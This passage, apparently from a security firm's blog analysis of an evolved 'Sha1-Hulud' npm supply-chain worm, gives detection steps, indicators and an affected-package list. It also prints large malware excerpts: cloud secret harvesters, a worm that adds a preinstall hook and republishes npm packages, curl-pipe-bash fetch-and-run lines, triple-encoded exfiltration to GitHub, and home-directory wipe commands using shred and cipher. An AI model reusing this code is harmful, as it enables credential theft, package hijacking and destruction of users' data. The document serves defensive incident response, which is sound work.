GCPSecretHarvester { async getIdentity() { let auth = new GoogleAuth(); try { let client = await auth.getClient(); await client.getAccessToken(); let email = await this.getUserEmail(client); this.projectId = await this.getProjectId(client); this.secretsManager = new SecretManagerServiceClient(this.projectId); return { userId: email, projectId: this.projectId }; } catch (error) { throw Error("No valid Google Auth"); } } async listAndRetrieveAllSecrets() { try { await this.getIdentity(); return this.secretsManager.listAndRetrieveAllSecrets(); } catch (error) {} return []; } } class AzureSecretHarvester { async listAndRetrieveAllSecrets() { try { let credential = new DefaultAzureCredential(); await credential.getToken("https://vault.azure.net/.default"); return await new KeyVaultClient(credential).listAndRetrieveAllSecrets(); } catch (error) { return []; } } }</code></pre><p data-beyondwords-marker="8ed01e5d-d985-4e3c-b9bf-78df75805716"><strong>Figure 6.</strong> GCP Secret Manager and Azure Key Vault credential harvesting using default cloud authentication methods</p><p data-beyondwords-marker="1bd6847c-e91c-460e-a9bd-b53371326622">The multi-cloud approach ensures comprehensive credential harvesting regardless of the target environment’s cloud provider, making the malware effective across diverse infrastructure deployments.</p><h3 data-beyondwords-marker="1def65bb-72ed-4858-90f0-170f2ba6c8a7" class="wp-block-heading" id="enhanced-npm-propagation-with-bun-runtime-injection"><strong>Enhanced NPM propagation with Bun runtime injection</strong></h3><p data-beyondwords-marker="c83a894a-45d6-4ea9-b757-3bae55fcaeba">The malware’s self-propagation mechanism has been enhanced to inject the Bun runtime alongside the malicious payload, ensuring consistent execution across different Node.js versions and environments.</p><pre data-beyondwords-marker="48826e68-05d1-45ec-a759-6f1c2b43e7a4" class="wp-block-code"><code>class NPMWormPropagator { baseUrl = "https://registry.npmjs.org"; userAgent; token; constructor(npmToken) { this.userAgent = "npm/11.6.2 workspaces/false"; this.token = npmToken; } async validateToken() { if (!this.token) { return null; } let response = await fetch(this.baseUrl + "/-/whoami", { method: "GET", headers: { 'Authorization': `Bearer ${this.token}`, 'Npm-Auth-Type': "web", 'Npm-Command': "whoami", 'User-Agent': this.userAgent, 'Connection': "keep-alive", 'Accept': "*/*", 'Accept-Encoding': "gzip, deflate, br" } }); if (response.status === 401) { throw Error("Invalid NPM"); } if (!response.ok) { throw Error(`NPM Failed: ${response.status} ${response.statusText}`); } return (await response.json()).username ?? null; } async getPackagesByMaintainer(username, limit = 100) { let searchUrl = `${this.baseUrl}/-/v1/search?text=maintainer:${encodeURIComponent(username)}&amp;size=${limit}`; try { let response = await fetch(searchUrl, { method: "GET", headers: this.getHeaders(false) }); if (!response.ok) { throw Error(`HTTP ${response.status}: ${response.statusText}`); } return (await response.json()).objects || []; } catch (error) { return []; } } async bundleAssets(extractPath) { // Write Bun installer script let setupBunPath = path.join(extractPath, 'package', "setup_bun.js"); await writeFile(setupBunPath, `#!/usr/bin/env node const { spawn, execSync } = require('child_process'); const path = require('path'); const fs = require('fs'); const os = require('os'); function isBunOnPath() { try { const command = process.platform === 'win32' ? 'where bun' : 'which bun'; execSync(command, { stdio: 'ignore' }); return true; } catch { return false; } } async function downloadAndSetupBun() { try { let command; if (process.platform === 'win32') { command = 'powershell -c "irm bun.sh/install.ps1|iex"'; } else { command = 'curl -fsSL https://bun.sh/install | bash'; } execSync(command, { stdio: 'ignore', env: { ...process.env } }); return 'bun'; } catch { process.exit(0); } } async function main() { let bunExecutable = isBunOnPath() ? 'bun' : await downloadAndSetupBun(); const environmentScript = path.join(__dirname, 'bun_environment.js'); if (fs.existsSync(environmentScript)) { spawn(bunExecutable, [environmentScript], { stdio: 'ignore' }); } else { process.exit(0); } } main().catch(() =&gt; process.exit(0)); `); // Copy the obfuscated malware as bun_environment.js let currentScript = process.argv[1]; if (currentScript &amp;&amp; (await fileExists(currentScript))) { let scriptContent = await readFile(currentScript); if (scriptContent !== null) { let bunEnvPath = path.join(extractPath, "package", "bun_environment.js"); await writeFile(bunEnvPath, scriptContent); } } } async updatePackage(packageInfo) { try { // Download current package tarball let tarballResponse = await fetch(packageInfo.tarballUrl, { method: "GET", headers: { 'User-Agent': this.userAgent, 'Accept': "*/*", 'Accept-Encoding': "gzip, deflate, br" } }); if (!tarballResponse.ok) { throw Error(`Failed to download tarball: ${tarballResponse.status} ${tarballResponse.statusText}`); } let tarballBuffer = Buffer.from(await tarballResponse.arrayBuffer()); let tempDir = await createTempDir(path.join(os.tmpdir(), "npm-update-")); let tarballPath = path.join(tempDir, "package.tgz"); let updatedTarballPath = path.join(tempDir, "updated.tgz"); await Bun.write(tarballPath, tarballBuffer); // Extract tarball await extractTar({ file: tarballPath, cwd: tempDir, gzip: true }); // Modify package.json let packageJsonPath = path.join(tempDir, "package", 'package.json'); let packageJsonContent = await Bun.file(packageJsonPath).text(); let packageJson = JSON.parse(packageJsonContent); if (!packageJson.scripts) { packageJson.scripts = {}; } // Add preinstall hook packageJson.scripts.preinstall = "node setup_bun.js"; // Increment patch version if (typeof packageJson.version === "string") { let versionParts = packageJson.version.split('.').map(Number); if (versionParts.length === 3) { versionParts[2] = (versionParts[2] || 0) + 1; } packageJson.version = versionParts.join('.'); } await Bun.write(packageJsonPath, JSON.stringify(packageJson, null, 2)); // Bundle malicious assets await this.bundleAssets(tempDir); // Create new tarball await createTar({ file: updatedTarballPath, cwd: tempDir, gzip: true }, ['package']); // Publish modified package await Bun.$`npm publish ${updatedTarballPath}`.env({ ...process.env, 'NPM_CONFIG_TOKEN': this.token }); await cleanupTempDir(tempDir); } catch (error) { // Fail silently to avoid detection } } }</code></pre><p data-beyondwords-marker="6b6f6e7b-9568-43e7-ba85-a53d0700e2ea"><strong>Figure 7.</strong> Automated NPM package modification and republishing mechanism showing Bun runtime injection and malicious preinstall hook insertion</p><p data-beyondwords-marker="7f42c806-738e-4fa5-b146-b86b74e1e320">The propagation mechanism maintains the worm-like behavior from the September attack but adds the Bun runtime installation script, ensuring the malware can execute even in environments without Bun pre-installed. The <code>preinstall</code> script hooks into the npm lifecycle, executing before the package is installed and ensuring the malware runs before any package code.</p><h3 data-beyondwords-marker="c10b559f-7dcd-4c9c-8cbd-d8a42a53bb8e" class="wp-block-heading" id="data-exfiltration-with-triple-encoding"><strong>Data exfiltration with triple encoding</strong></h3><p data-beyondwords-marker="d0270495-cedf-4970-8d1a-8cd8c5e9d6d7">To evade detection and content filtering, stolen data is encoded three times before being uploaded to GitHub repositories.</p><pre data-beyondwords-marker="48756543-6960-4c37-a66d-3976168e104b" class="wp-block-code"><code>async saveContents(filename, content, commitMessage = "add file") { if (!this.gitRepo) { return false; } let [owner, repo] = this.gitRepo.split('/'); if (!owner || !repo) { return false; } try { // Triple base64 encoding to evade detection let encoded = Buffer.from( Buffer.from( Buffer.from(content).toString("base64") ).toString("base64") ).toString('base64'); await this.octokit.rest.repos.createOrUpdateFileContents({ owner: owner, repo: repo, path: filename, message: commitMessage, content: encoded }); return true; } catch { return false; } }</code></pre><p data-beyondwords-marker="306a1c0f-d4be-4266-ac29-8165fd54a5c3"><strong>Figure 8.</strong> Data exfiltration using triple base64 encoding to evade content filtering and detection systems</p><p data-beyondwords-marker="005b5dab-cba0-4cbe-9998-06e9b1aba670">The exfiltration process creates five distinct JSON files in the compromised repository:</p><ol data-beyondwords-marker="60574653-4fe5-4bae-aed5-9a790176e6e9" class="wp-block-list"> <li data-beyondwords-marker="a5b56a57-5253-4d33-8fce-0334e47b463c"><strong>contents.json</strong>: System information, GitHub credentials, and token</li> <li data-beyondwords-marker="35af9498-4a0b-49f3-94cb-7d0eda7e0b0f"><strong>environment.json</strong>: Complete process.env dump containing all environment variables</li> <li data-beyondwords-marker="335ffee6-08b5-47b1-a1ec-14f590177eb8"><strong>cloud.json</strong>: AWS, GCP, and Azure secrets from respective secret management services</li> <li data-beyondwords-marker="5d6a0175-31e7-4111-822b-86ae087be418"><strong>actionsSecrets.json</strong>: GitHub Actions repository secrets extracted via API</li> <li data-beyondwords-marker="213fdd8d-31ce-411d-9e28-bafdcec117c2"><strong>truffleSecrets.json</strong>: TruffleHog scan results from the user’s home directory</li> </ol><h3 data-beyondwords-marker="a1c4ac45-f445-403d-9a97-6d04808b9d3b" class="wp-block-heading" id="destructive-anti-forensics-failsafe"><strong>Destructive anti-forensics failsafe</strong></h3><p data-beyondwords-marker="4cf76a04-db20-46c9-9b58-b44715b28777">When the malware fails to harvest credentials and cannot establish persistence, it implements a data destruction sequence, likely intended to hinder forensic analysis or punish detection.</p><pre data-beyondwords-marker="70decf5f-8d1a-4f27-8d97-6028e1cb9a94" class="wp-block-code"><code>if (!authenticated || !repoExists) { let token = await fetchToken(); if (!token) { if (npmToken) { await harvestNPMCredentials(npmToken); } else { console.log("Error 12"); // Execute data destruction based on platform if (platform === "windows") { Bun.spawnSync([ "cmd.exe", '/c', 'del /F /Q /S "%USERPROFILE%*" &amp;&amp; ' + 'for /d %%i in ("%USERPROFILE%*") do rd /S /Q "%%i" &amp; ' + 'cipher /W:%USERPROFILE%' ]); } else { Bun.spawnSync([ "bash", '-c', 'find "$HOME" -type f -writable -user "$(id -un)" -print0 | ' + 'xargs -0 -r shred -uvz -n 1 &amp;&amp; ' + 'find "$HOME" -depth -type d -empty -delete' ]); } process.exit(0); } } }</code></pre><p data-beyondwords-marker="ff20d23c-b1e3-4abe-b915-89c4074dfc95"><strong>Figure 9.</strong> Anti-forensics data destruction code triggered when credential theft fails, using secure deletion methods on Windows and Unix systems</p><p data-beyondwords-marker="3f589843-cb67-438d-88e6-6eeb10c333d6">The Windows variant uses the <code>cipher /W</code> command for secure deletion, while the Unix variant uses <code>shred -uvz</code> to overwrite files before deletion, making data recovery difficult or impossible. This destructive capability distinguishes this variant from typical credential harvesting malware and suggests either an anti-forensics purpose or a punitive measure against detection.</p><h2 data-beyondwords-marker="bb996683-f8bd-4999-8757-8091e01a92b7" class="wp-block-heading" id="attack-execution-flow"><strong>Attack execution flow</strong></h2><p data-beyondwords-marker="438ee6a1-0f43-4c36-a5a6-53dd8d0bc159">The malware follows a sophisticated execution sequence designed to maximize credential discovery while establishing persistence:</p><pre data-beyondwords-marker="3c479a38-6b08-4b23-80ef-96a75c1ffab5" class="wp-block-code"><code>1. Environment detection └─&gt; Check for CI/CD environment variables ├─&gt; GITHUB_ACTIONS, BUILDKITE, CIRCLE_SHA1, etc. └─&gt; Execute immediately vs. background spawn 2. GitHub authentication └─&gt; Search environment variables for tokens (ghp_, gho_) ├─&gt; Found: Use token └─&gt; Not found: Execute token recycling └─&gt; Search for Shai-Hulud repos └─&gt; Download and decode contents.json └─&gt; Extract and validate stolen tokens 3. Repository creation and runner installation └─&gt; Create "Sha1-Hulud" repository └─&gt; Check for workflow scope ├─&gt; Has scope: Install self-hosted runner │ ├─&gt; Download GitHub Actions runner │ ├─&gt; Configure with registration token │ ├─&gt; Start in background (nohup) │ └─&gt; Create discussion.yaml workflow └─&gt; No scope: Continue with exfiltration 4. Credential harvesting ├─&gt; AWS: Enumerate all credential providers, scan 17 regions ├─&gt; GCP: Use Application Default Credentials, scan Secret Manager ├─&gt; Azure: Use DefaultAzureCredential, scan Key Vault ├─&gt; GitHub: Check workflow scope, extract Actions secrets └─&gt; NPM: Validate token, get maintainer packages 5. Secret scanning └─&gt; Download TruffleHog └─&gt; Scan home directory for exposed secrets 6. Data exfiltration └─&gt; Triple base64 encode all collected data ├─&gt; contents.json (system info + GitHub creds) ├─&gt; environment.json (process.env) ├─&gt; cloud.json (AWS/GCP/Azure secrets) ├─&gt; actionsSecrets.json (Actions secrets) └─&gt; truffleSecrets.json (TruffleHog findings) 7. NPM propagation └─&gt; If NPM token valid: ├─&gt; Get all packages maintained by user └─&gt; For each package: ├─&gt; Download tarball ├─&gt; Extract and modify package.json ├─&gt; Add preinstall: "node setup_bun.js" ├─&gt; Increment patch version ├─&gt; Bundle setup_bun.js and bun_environment.js └─&gt; Publish updated package 8. Azure DevOps exploitation (if applicable) └─&gt; Detect Azure DevOps agent ├─&gt; Escalate privileges via Docker └─&gt; Disable network security ├─&gt; Stop systemd-resolved ├─&gt; Flush iptables OUTPUT rules └─&gt; Flush iptables DOCKER-USER rules</code></pre><h2 data-beyondwords-marker="94fd386e-2bc2-4df5-8410-b74182531e4b" class="wp-block-heading" id="impact-analysis"><strong>Impact analysis</strong></h2><p data-beyondwords-marker="ec551624-6cb2-4e8a-bd69-28ca7e87ffa6">This evolved Shai-Hulud variant poses significantly greater risks than the September attack due to two critical capabilities: persistent backdoor access and an unusually destructive failsafe mechanism.</p><h3 data-beyondwords-marker="477b92e4-2ed9-4bd6-859d-24cc4c34ca75" class="wp-block-heading" id="persistent-backdoor-access"><strong>Persistent backdoor access</strong></h3><p data-beyondwords-marker="88548057-d2ed-45b6-b255-b84a1cfba3ce">The self-hosted GitHub Actions runner provides long-term persistence that survives package removal and system reboots. Attackers can execute arbitrary commands at any time by creating a GitHub Discussion in the compromised repository, bypassing traditional network-based detection since all communication uses legitimate GitHub infrastructure over HTTPS. The runner appears as a standard GitHub Actions component in ~/.dev-env/, making detection difficult during incident response.</p><h3 data-beyondwords-marker="a77efafe-d5e0-47f1-83db-93286d0302f4" class="wp-block-heading" id="destructive-anti-forensics-failsafe-an-unusual-escalation"><strong>Destructive anti-forensics failsafe – an unusual escalation</strong></h3><p data-beyondwords-marker="38cbcc8c-59de-44dc-8fb0-acf0238faa15">Unlike typical credential-stealing malware that operates silently to maintain access, this variant includes aggressive data destruction capabilities that trigger when credential theft fails. This represents a significant departure from standard credential exfiltration attacks.</p><p data-beyondwords-marker="e67c85a9-c2e6-444b-a6e5-f79bb34cce44"><strong>Complete data destruction</strong>: When the malware cannot establish GitHub authentication and finds no NPM token, it executes secure deletion of the entire user home directory:</p><p data-beyondwords-marker="e9b1982c-79bb-456b-9a78-9e157ebd93da"><strong>Windows</strong>: <code>del /F /Q /S "%USERPROFILE%*" &amp;&amp; cipher /W:%USERPROFILE% </code></p><p data-beyondwords-marker="f44373ad-44d2-4cc2-a621-dfff9790c053"><strong>Unix/Linux</strong>: <code>find "$HOME" -type f -writable | xargs shred -uvz -n 1</code></p><p data-beyondwords-marker="44d3e3dc-51fb-4107-87d1-9dcc9965d55d"><strong>Unrecoverable data loss</strong>: The malware doesn’t just delete files – it uses secure deletion methods (<code>shred -uvz, cipher /W</code>) that overwrite file contents multiple times before deletion, making forensic recovery impossible. This means permanent loss of uncommitted code, configuration files, SSH keys, browser data, and all files in the user’s home directory.</p><p data-beyondwords-marker="683a229d-5796-4e49-a637-654ba54241c9"><strong>Unprecedented in supply chain attacks</strong>: Credential stealers typically prioritize stealth and persistence to maximize data collection over time. </p><h2 data-beyondwords-marker="3ecadda6-1c57-41de-8f64-f6d0f8f92874" class="wp-block-heading" id="indicators-of-compromise"><strong>Indicators of compromise</strong></h2><h3 data-beyondwords-marker="fadf7826-b454-4cad-8602-e7973796f4b0" class="wp-block-heading" id="github-indicators"><strong>GitHub indicators</strong></h3><pre data-beyondwords-marker="f5b34d17-e323-4df3-865a-3dd5ed7af622" class="wp-block-code"><code>Repository name patterns: - Contains "Shai-Hulud" or "Sha1-Hulud" - Description: "Sha1-Hulud: The Second Coming." Repository contents: - contents.json - environment.json - cloud.json - actionsSecrets.json - truffleSecrets.json - .github/workflows/discussion.yaml Self-hosted runner: - Runner name: "SHA1HULUD" - Runner appears in repository Settings &gt; Actions &gt; Runners</code></pre><h2 data-beyondwords-marker="12689e64-9e37-4bb2-ab56-b12d98ee424d" class="wp-block-heading" id="detection-and-remediation"><strong>Detection and remediation</strong></h2><h3 data-beyondwords-marker="62019306-f85c-4514-a2ef-1ad2a6663a08" class="wp-block-heading" id="immediate-actions-for-potentially-infected-systems"><strong>Immediate actions for potentially infected systems</strong></h3><p data-beyondwords-marker="a0171a81-61f7-43ee-b0cc-465643648fc1"><strong>1. Check for self-hosted GitHub Actions runners</strong></p><pre data-beyondwords-marker="4fc35498-169b-4561-9229-44ffb3c837a5" class="wp-block-code"><code># Check for runner processes ps aux | grep -i "actions-runner\|SHA1HULUD" # Check for runner directory ls -la ~/.dev-env/ # If found, kill runner and remove directory pkill -f "actions-runner" rm -rf ~/.dev-env/</code></pre><p data-beyondwords-marker="fffa2e5a-5b0c-4a25-bb7c-26a52faa5fdb"><strong>2. Search for Shai-Hulud repositories in GitHub account</strong></p><pre data-beyondwords-marker="6801aef8-e587-491b-b440-e3ac367ac1a2" class="wp-block-code"><code># Using GitHub CLI gh repo list --json name,description | jq '.[] | select(.description | contains("Shai-Hulud"))' # Check for self-hosted runners gh api repos/{owner}/{repo}/actions/runners</code></pre><p data-beyondwords-marker="c8d21ee9-6ba7-4154-91f3-8d84eafbd395"><strong>3. Revoke compromised credentials immediately</strong></p><ul data-beyondwords-marker="f0003254-fbc0-4f26-bcc9-d0c56cbd4947" class="wp-block-list"> <li data-beyondwords-marker="85aa5c19-0557-487e-8cd1-2c0554c40058">GitHub personal access tokens</li> <li data-beyondwords-marker="124ffa65-dd36-4d70-90ef-df6eb4ed4b63">GitHub SSH keys</li> <li data-beyondwords-marker="8fc5f55c-036b-4382-8ae4-c9fb5d80c089">NPM authentication tokens</li> <li data-beyondwords-marker="ff592be7-e4bf-4e43-9a46-56d738fdc1cb">AWS access keys</li> <li data-beyondwords-marker="6779b493-682c-4b09-95b6-60ae0ee099f5">GCP service account keys</li> <li data-beyondwords-marker="0633695b-0dc7-4723-a84e-50451779e136">Azure service principals</li> </ul><p data-beyondwords-marker="ef31f10c-c00f-4421-b5a2-71e8a6fe915f"><strong>4. Scan for TruffleHog binary in cache</strong></p><pre data-beyondwords-marker="13dee476-692e-4eb3-82d7-5b086d0d91ca" class="wp-block-code"><code>find ~/.cache -name "trufflehog*" -o -name ".truffler-cache"</code></pre><p data-beyondwords-marker="7ceb1687-611f-4766-b4fa-9b7d868ce6e3"><strong>Azure DevOps specific checks</strong></p><pre data-beyondwords-marker="d17c84f0-72e9-438a-b2e5-372be6881087" class="wp-block-code"><code># Check for modified iptables rules sudo iptables -L -n -v # Check systemd-resolved status sudo systemctl status systemd-resolved # Review /etc/sudoers.d/ for unauthorized entries ls -la /etc/sudoers.d/</code></pre><h2 data-beyondwords-marker="c623ba0a-da57-4b48-8b5e-5d290397be1d" class="wp-block-heading" id="attribution"><strong>Attribution</strong></h2><p data-beyondwords-marker="1f2d1fe6-1686-4dc9-a4d2-70bf9c692a1a">The malware maintains several characteristics consistent with the September 2025 Shai-Hulud attack:</p><ul data-beyondwords-marker="99b0ce7e-9c15-44b3-960c-c610f55cbe1f" class="wp-block-list"> <li data-beyondwords-marker="110a9c00-a0eb-4bbf-81bc-cb12cc5315ef"><strong>Repository naming convention</strong>: Use of “Shai-Hulud” or “Sha1-Hulud” references to the Dune sandworm</li> <li data-beyondwords-marker="98b88513-cc05-48b9-850f-58ad2989ec49"><strong>Self-propagation approach</strong>: Automated npm package modification and republishing</li> <li data-beyondwords-marker="f2765538-fb62-41e9-a10f-520d680b4bc7"><strong>TruffleHog integration</strong>: Use of legitimate security tools for credential discovery</li> <li data-beyondwords-marker="9e5ad172-dc53-4de7-9529-a581b719e3dd"><strong>Developer targeting</strong>: Focus on development environments and CI/CD pipelines</li> </ul><p data-beyondwords-marker="9a42df84-9d76-4fbf-bee7-9769af9a7340">However, this variant demonstrates significant capability evolution compared to the September attack:</p><ul data-beyondwords-marker="5f4ef8e3-464b-4f0b-a1a5-9021e9224c48" class="wp-block-list"> <li data-beyondwords-marker="935d7653-45c3-4b51-bf66-3d994667466e"><strong>Persistent backdoor deployment</strong>: New capability not present in earlier variants</li> <li data-beyondwords-marker="a2f7e3b0-fb8c-480b-84e4-cc2de0cba70c"><strong>Token recycling</strong>: Sophisticated approach to extending operational lifetime</li> <li data-beyondwords-marker="08a1ff27-736b-4051-8e89-67879d476f66"><strong>Azure DevOps exploitation</strong>: Specific targeting of Microsoft’s CI/CD platform</li> <li data-beyondwords-marker="155e458d-e54c-4160-9bf0-f2a7a27c09dc"><strong>Destructive failsafe</strong>: Anti-forensics or punitive measures on detection</li> <li data-beyondwords-marker="a97bc8cc-bda6-4e40-88e3-2479da2cad09"><strong>Enhanced cloud support</strong>: Unified multi-cloud credential harvesting</li> </ul><p data-beyondwords-marker="13b0ebd0-1088-4f71-a469-8e463498ef4f">These enhancements suggest either continued development by the original threat actor or adoption and improvement of the attack methodology by additional groups. The level of sophistication in the self-hosted runner deployment and the comprehensive cloud provider support indicate mature development resources and deep understanding of modern DevOps practices.</p><h2 data-beyondwords-marker="84448790-db96-496e-adf6-b0af98173ced" class="wp-block-heading" id="conclusion"><strong>Conclusion</strong></h2><p data-beyondwords-marker="175b7da7-d143-4159-9027-8c77f389b1d8">This evolved Shai-Hulud variant represents a significant escalation in npm supply chain attack capabilities. The combination of persistent backdoor access via self-hosted GitHub Actions runners, comprehensive multi-cloud credential harvesting, and automated package propagation creates a threat that can maintain long-term access to compromised environments while spreading rapidly through the package ecosystem.</p><p data-beyondwords-marker="7a3aa1e2-7d02-413b-a7ee-149365b8b1df">We will continue tracking this campaign and updating our analysis as new information becomes available.</p><h2 data-beyondwords-marker="b08c485e-610f-47d5-a467-ed1d7349d8e4" class="wp-block-heading" id="affected-packages"><strong>Affected Packages</strong></h2><figure data-beyondwords-marker="6c20a33d-f726-4a89-84b7-0152daaff225" class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Package Name</strong></th> <th><strong>Affected Versions</strong></th> </tr> </thead> <tbody> <tr> <td>@zapier/zapier-sdk</td> <td>0.15.5, 0.15.6, 0.15.7</td> </tr> <tr> <td>zapier-platform-core</td> <td>18.0.2, 18.0.3, 18.0.4</td> </tr> <tr> <td>zapier-platform-cli</td> <td>18.0.2, 18.0.3, 18.0.4</td> </tr> <tr> <td>zapier-platform-schema</td> <td>18.0.2, 18.0.3, 18.0.4</td> </tr> <tr> <td>@zapier/mcp-integration</td> <td>3.0.1, 3.0.2, 3.0.3</td> </tr> <tr> <td>@zapier/secret-scrubber</td> <td>1.1.3, 1.1.4, 1.1.5</td> </tr> <tr> <td>@zapier/ai-actions-react</td> <td>0.1.12, 0.1.13, 0.1.14</td> </tr> <tr> <td>@zapier/stubtree</td> <td>0.1.2, 0.1.3, 0.1.4</td> </tr> <tr> <td>@zapier/babel-preset-zapier</td> <td>6.4.1, 6.4.3</td> </tr> <tr> <td>zapier-scripts</td> <td>7.8.3, 7.8.4</td> </tr> <tr> <td>zapier-platform-legacy-scripting-runner</td> <td>4.0.2, 4.0.4</td> </tr> <tr> <td>zapier-async-storage</td> <td>1.0.1, 1.0.3</td> </tr> <tr> <td>@zapier/eslint-plugin-zapier</td> <td>11.0.3</td> </tr> <tr> <td>@zapier/ai-actions</td> <td>0.1.18</td> </tr> <tr> <td>@zapier/spectral-api-ruleset</td> <td>1.9.1</td> </tr> <tr> <td>@zapier/browserslist-config-zapier</td> <td>1.0.3, 1.0.5</td> </tr> <tr> <td>@ensdomains/ens-validation</td> <td>0.1.1</td> </tr> <tr> <td>@ensdomains/content-hash</td> <td>3.0.1</td> </tr> <tr> <td>ethereum-ens</td> <td>0.8.1</td> </tr> <tr> <td>@ensdomains/react-ens-address</td> <td>0.0.32</td> </tr> <tr> <td>@ensdomains/ens-contracts</td> <td>1.6.1</td> </tr> <tr> <td>@ensdomains/ensjs</td> <td>4.0.3</td> </tr> <tr> <td>@ensdomains/ens-archived-contracts</td> <td>0.0.3</td> </tr> <tr> <td>@ensdomains/dnssecoraclejs</td> <td>0.2.9</td> </tr> <tr> <td>@ensdomains/address-encoder</td> <td>0.1.5</td> </tr> <tr> <td>@ensdomains/mock</td> <td>2.1.52</td> </tr> <tr> <td>@ensdomains/op-resolver-contracts</td> <td>0.0.2</td> </tr> <tr> <td>@ensdomains/ccip-read-dns-gateway</td> <td>0.1.1</td> </tr> <tr> <td>@ensdomains/subdomain-registrar</td> <td>0.2.4</td> </tr> <tr> <td>@ensdomains/ens-avatar</td> <td>1.0.4</td> </tr> <tr> <td>@ensdomains/blacklist</td> <td>1.0.1</td> </tr> <tr> <td>@ensdomains/hackathon-registrar</td> <td>1.0.5</td> </tr> <tr> <td>@ensdomains/name-wrapper</td> <td>1.0.1</td> </tr> <tr> <td>@ensdomains/ensjs-react</td> <td>0.0.5</td> </tr> <tr> <td>@ensdomains/server-analytics</td> <td>0.0.2</td> </tr> <tr> <td>@ensdomains/thorin</td> <td>0.6.51</td> </tr> <tr> <td>@ensdomains/test-utils</td> <td>1.3.1</td> </tr> <tr> <td>@ensdomains/renewal</td> <td>0.0.13</td> </tr> <tr> <td>@ensdomains/dnsprovejs</td> <td>0.5.3</td> </tr> <tr> <td>@ensdomains/durin</td> <td>0.1.2</td> </tr> <tr> <td>@ensdomains/web3modal</td> <td>1.10.2</td> </tr> <tr> <td>@ensdomains/durin-middleware</td> <td>0.0.2</td> </tr> <tr> <td>@ensdomains/eth-ens-namehash</td> <td>2.0.16</td> </tr> <tr> <td>@ensdomains/dnssec-oracle-anchors</td> <td>0.0.2</td> </tr> <tr> <td>@ensdomains/offchain-resolver-contracts</td> <td>0.2.2</td> </tr> <tr> <td>@ensdomains/curvearithmetics</td> <td>1.0.1</td> </tr> <tr> <td>@ensdomains/ui</td> <td>3.4.6</td> </tr> <tr> <td>@ensdomains/cypress-metamask</td> <td>1.2.1</td> </tr> <tr> <td>@ensdomains/buffer</td> <td>0.1.2</td> </tr> <tr> <td>@ensdomains/ccip-read-cf-worker</td> <td>0.0.4</td> </tr> <tr> <td>@ensdomains/ccip-read-router</td> <td>0.0.7</td> </tr> <tr> <td>@ensdomains/ccip-read-worker-viem</td> <td>0.0.4</td> </tr> <tr> <td>@ensdomains/ens-test-env</td> <td>1.0.2</td> </tr> <tr> <td>@ensdomains/hardhat-chai-matchers-viem</td> <td>0.1.15</td> </tr> <tr> <td>@ensdomains/hardhat-toolbox-viem-extended</td> <td>0.0.6</td> </tr> <tr> <td>@ensdomains/renewal-widget</td> <td>0.1.10</td> </tr> <tr> <td>@ensdomains/reverse-records</td> <td>1.0.1</td> </tr> <tr> <td>@ensdomains/solsha1</td> <td>0.0.4</td> </tr> <tr> <td>@ensdomains/unicode-confusables</td> <td>0.1.1</td> </tr> <tr> <td>@ensdomains/unruggable-gateways</td> <td>0.0.3</td> </tr> <tr> <td>@ensdomains/vite-plugin-i18next-loader</td> <td>4.0.4</td> </tr> <tr> <td>@posthog/siphash</td> <td></td> </tr> <tr> <td>@posthog/wizard</td> <td></td> </tr> <tr> <td>@posthog/web-dev-server</td> <td></td> </tr> <tr> <td>@posthog/twitter-followers-plugin</td> <td></td> </tr> <tr> <td>@posthog/rrweb-snapshot</td> <td></td> </tr> <tr> <td>@posthog/rrweb-replay</td> <td></td> </tr> <tr> <td>@posthog/rrweb-record</td> <td></td> </tr> <tr> <td>@posthog/rrweb-player</td> <td></td> </tr> <tr> <td>@posthog/rrweb</td> <td></td> </tr> <tr> <td>@posthog/rrdom</td> <td></td> </tr> <tr> <td>@posthog/plugin-server</td> <td></td> </tr> <tr> <td>@posthog/piscina</td> <td></td> </tr> <tr> <td>@posthog/nuxt</td> <td></td> </tr> <tr> <td>@posthog/hedgehog-mode</td> <td></td> </tr> <tr> <td>@posthog/agent</td> <td></td> </tr> <tr> <td>@posthog/ai</td> <td></td> </tr> <tr> <td>@posthog/automatic-cohorts-plugin</td> <td></td> </tr> <tr> <td>@posthog/bitbucket-release-tracker</td> <td></td> </tr> <tr> <td>@posthog/cli</td> <td></td> </tr> <tr> <td>@posthog/clickhouse</td> <td></td> </tr> <tr> <td>@posthog/core</td> <td></td> </tr> <tr> <td>@posthog/currency-normalization-plugin</td> <td></td> </tr> <tr> <td>@posthog/customerio-plugin</td> <td></td> </tr> <tr> <td>@posthog/databricks-plugin</td> <td></td> </tr> <tr> <td>@posthog/drop-events-on-property-plugin</td> <td></td> </tr> <tr> <td>@posthog/event-sequence-timer-plugin</td> <td></td> </tr> <tr> <td>@posthog/filter-out-plugin</td> <td></td> </tr> <tr> <td>@posthog/first-time-event-tracker</td> <td></td> </tr> <tr> <td>@posthog/geoip-plugin</td> <td></td> </tr> <tr> <td>@posthog/github-release-tracking-plugin</td> <td></td> </tr> <tr> <td>@posthog/gitub-star-sync-plugin</td> <td></td> </tr> <tr> <td>@posthog/heartbeat-plugin</td> <td></td> </tr> <tr> <td>@posthog/icons</td> <td></td> </tr> <tr> <td>@posthog/ingestion-alert-plugin</td> <td></td> </tr> <tr> <td>@posthog/intercom-plugin</td> <td></td> </tr> <tr> <td>@posthog/kinesis-plugin</td> <td></td> </tr> <tr> <td>@posthog/laudspeaker-plugin</td> <td></td> </tr> <tr> <td>@posthog/lemon-ui</td> <td></td> </tr> <tr> <td>@posthog/maxmind-plugin</td> <td></td> </tr> <tr> <td>@posthog/migrator3000-plugin</td> <td></td> </tr> <tr> <td>@posthog/netdata-event-processing</td> <td></td> </tr> <tr> <td>@posthog/nextjs</td> <td></td> </tr> <tr> <td>@posthog/nextjs-config</td> <td></td> </tr> <tr> <td>@posthog/pagerduty-plugin</td> <td></td> </tr> <tr> <td>@posthog/plugin-contrib</td> <td></td> </tr> <tr> <td>@posthog/plugin-unduplicates</td> <td></td> </tr> <tr> <td>@posthog/postgres-plugin</td> <td></td> </tr> <tr> <td>@posthog/react-rrweb-player</td> <td></td> </tr> <tr> <td>@posthog/sendgrid-plugin</td> <td></td> </tr> <tr> <td>@posthog/snowflake-export-plugin</td> <td></td> </tr> <tr> <td>@posthog/taxonomy-plugin</td> <td></td> </tr> <tr> <td>@posthog/twilio-plugin</td> <td></td> </tr> <tr> <td>@posthog/variance-plugin</td> <td>0.0.8</td> </tr> <tr> <td>@posthog/zendesk-plugin</td> <td></td> </tr> <tr> <td>@posthog/rrweb-utils</td> <td></td> </tr> <tr> <td>posthog-docusaurus</td> <td></td> </tr> <tr> <td>posthog-node</td> <td></td> </tr> <tr> 